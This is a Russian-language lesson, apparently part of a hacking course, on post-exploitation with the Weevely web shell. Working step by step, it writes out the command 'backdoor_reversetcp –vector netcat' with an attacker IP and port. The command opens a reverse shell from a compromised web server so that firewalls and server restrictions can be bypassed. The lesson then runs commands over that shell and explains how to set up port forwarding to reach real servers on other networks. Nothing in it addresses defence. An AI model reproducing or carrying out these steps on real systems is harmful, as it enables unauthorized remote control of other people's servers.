Пост-эксплуатация

#8 После атаки. Устанавливаем обратное соединение с помощью Weevely. Пост-эксплуатация.

В этом уроке мы рассмотрим, как установить обратное соединение с помощью шелла Weevely. В данный момент мы уже загрузили шелл Weevely, и подключаемся к нему напрямую:

в некоторых случаях Вы не сможете запустить некоторые команды таким способом, т.е. сейчас я могу запустить любую команду линукс, и она будет успешно выполнена.

Мы также посмотрим, как использовать команду «shell.sh», и с помощью нее мы попытаемся запустить команды, если их не получается запускать обычным образом, и если ничего из этого не сработает, или Вы просто хотите установить обратное соединение с атакуемого веб-сервера к Вашей машине, то Вы можете повторить то, что я буду делать в рамках этого урока.

Это может быть действительно полезно, потому что у Вас будет прямое подключение, и Вы сможете обойти ограничения безопасности. Для начала напишем «help», и откроем опции, которые у нас есть:

И функция, которую я буду использовать в данном уроке имеет название «:backdoor_reversetcp»:

И, по сути, с помощью этой функции, у нас будет обратный tcp-шелл, т.е. он не будет выполнен через php. Это будет обратный шелл, идущий с сервера на Ваш компьютер. С помощью этого метода можно обойти файрволлы, потому что соединение идет от веб-сервера, а не к веб-серверу.

Первое, что мы сделаем, так это пропишем нашу функцию, которая называется «backdoor_reverstcp». И я добавлю опцию «-h», чтобы увидеть все параметры этой функции:

Нам нужно, чтобы подключение было автоматическим, поэтому не используем опцию «no-autoconnect». Далее необходимо указать опцию «-vector», которая очень важна для нас на данный момент. С его помощью мы указываем, каким образом будет произведено обратное подключение. Это ряд языков программирования, которые есть в справке:

Важно дальше поэтапно экспериментировать с параметрами опции «-vector», так как в отдельно взятом случае у нас не будет доступа к параметрам. Нужно просто перебирать все возможные параметры, чтобы добиться результата. Как только Вы найдете работающий параметр, Вы сможете обойти множество ограничений со стороны сервера, и Вы точно можете запускать «bash-команды» на целевом сервере.

Давайте перейдем к практике и запишем нашу команду: «backdoor_reversetcp –vector netcat». Далее указываем параметр «lhost» или локалхост, и затем вводим порт, через который мы хотим провести соединение.

Проверим наш ip-адрес, с помощью команды «ifconfig»:

Добавим ip-адрес  в нашу команду и укажем порт 8080. Команда примет вид:

«backdoor_reversetcp –vector netcat 192.168.15.128 8080»:

И теперь наше соединение установлено. Мы можем запускать любые команды. Учитывайте, что эти команды будут выполняться через «netcat».

Сейчас соединение идет обратно. От сервера к нам, общаясь с ним через абсолютно другой порт. Теперь команды, которые мы не могли использовать ранее, теперь находятся в нашем распоряжении.

Мы можем использовать команды, например, «pwd» не забывая про точку с запятой:

Воспользуемся «whoami»:

Похоже, что соединение отвалилось. Пробуем снова:

Все сработало.

Если Вы хотите принимать соединение с реального веб-сервера, и при этом, Вы не находитесь в той же сети, что и этот сервер, то Вам нужно настроить Вашу виртуальную машину на Kali c пробросом портов, т.е. перенаправить порт, который Вы используете. В данном случае – это порт 8080.

На этом все. Всем хорошего дня.

Первая часть статьи по пост-эксплуатации.

Вторая часть статьи по пост-эксплуатации.

Третья часть статьи по пост-эксплуатации.

Четвертая часть статьи по пост-эксплуатации.

Пятая часть статьи по пост-эксплуатации.

Шестая часть статьи по пост-эксплуатации.

Седьмая часть статьи по пост=эксплуатации.